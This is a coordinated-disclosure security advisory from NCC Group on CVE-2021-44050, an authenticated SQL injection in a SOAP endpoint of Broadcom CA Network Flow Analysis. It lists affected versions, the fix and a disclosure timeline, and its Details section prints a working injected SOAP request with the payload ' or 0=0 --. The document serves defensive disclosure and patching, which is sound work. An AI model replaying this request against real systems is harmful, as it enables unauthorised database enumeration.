Technical Advisory – Authenticated SQL Injection in SOAP Request in Broadcom CA Network Flow Analysis (CVE-2021-44050)

Vendor: Broadcom
Vendor URL: https://www.broadcom.com/
Systems Affected: CA Network Flow Analysis
Versions affected: 9.3.8, 9.5, 10.0, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 21.2.1 (Note: older, unsupported versions may be affected)
Author: Anthony Ferrillo <anthony.ferrillo[at]nccgroup[dot]com>
CVE Identifier: CVE-2021-44050
Advisory URL: https://support.broadcom.com/external/content/security-advisories/CA20211201-01-Security-Notice-for-CA-Network-Flow-Analysis/19689
Risk: Medium - 6.5 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) (Authenticated SQL Injection)

Summary

The Network Flow Analysis software (formerly known as CA Network Flow Analysis) is a network traffic monitoring solution, which is used to monitor and optimize the performance of network infrastructures. The “Interfaces” Section of the Network Flow Analysis web application made use of a Flash application, which performed SOAP requests. The Flash request was reachable from the following URL:

• https://nfa.myservice.EXAMPLE.com/ra/default.aspx?pg=3000 mn=101 timeperiod=2  (Interface Index > Group)

The Interface search bar performed internal SOAP requests. The request was providing a series of parameters which were used to perform a SQL query to retrieve information from the backend database. The parameters were not validated prior the SQL query, allowing a malicious user to inject arbitrary SQL queries to enumerate and retrieve information from the database.

Impact

Successful exploitation of this issue would allow a low privileged user to enumerate and retrieve information from the backend database of the Network Flow Analysis web application.

Details

The Interface search bar performed internal SOAP requests. The following is an example of the request:

POST //ra/authorization/GroupTreeWS.asmx HTTP/1.1
[…]

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns_s="http://www.w3.org/2001/XMLSchema" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance">
  <SOAP-ENV:Body>
    <tns:GetRouterInterfaceByGroupID xmlns_tns="http://example/GroupTreeWS">
      <tns:userId>61</tns:userId>
      <tns:groupId>1597</tns:groupId>
      <tns:orderBy>RouterName, Name </tns:orderBy>
      <tns:sortOrder></tns:sortOrder>
      <tns:limit>10</tns:limit>
      <tns:offset>0</tns:offset>
      <tns:filter>test</tns:filter>
      <tns:activeFilter xsi_nil="true"/>
    </tns:GetRouterInterfaceByGroupID>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

It was possible to retrieve a verbose error message from the backend database by tampering the request in the orderBy parameter. An example request of the vulnerability is the following:

Request

POST //ra/authorization/GroupTreeWS.asmx HTTP/1.1
[…]

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns_s="http://www.w3.org/2001/XMLSchema" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance">
  <SOAP-ENV:Body>
    <tns:GetRouterInterfaceByGroupID xmlns_tns="http://example/GroupTreeWS">
      <tns:userId>61</tns:userId>
      <tns:groupId>1597</tns:groupId>
      <tns:orderBy>RouterName, Name' or 0=0 -- </tns:orderBy>
      <tns:sortOrder></tns:sortOrder>
      <tns:limit>10</tns:limit>
      <tns:offset>0</tns:offset>
      <tns:filter>test</tns:filter>
      <tns:activeFilter xsi_nil="true"/>
    </tns:GetRouterInterfaceByGroupID>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The following payload was used for the boolean-based blind SQL injection in the request:

' or 0=0 --

Recommendation

Upgrade to 21.2.2 or above.
Alternatively, apply the appropriate fix provided for 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, and/or 21.2.1.

Vendor Communication

2021-06-10 - Reported to Broadcom Product Security Center
2021-06-29 - Broadcom confirm they are able to reproduce the vulnerability and are working to address the vulnerability
2021-06-29 - We request an estimated date for a fix from Broadcom
2021-07-16 - Broadcom advise they are still working on addressing the issue. Request that we hold off any disclosure.
2021-12-01 - New version released, which addresses the reported vulnerability.
2021-12-02 - Advisory Published

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  12/02/2021

Written by:  Anthony Ferrillo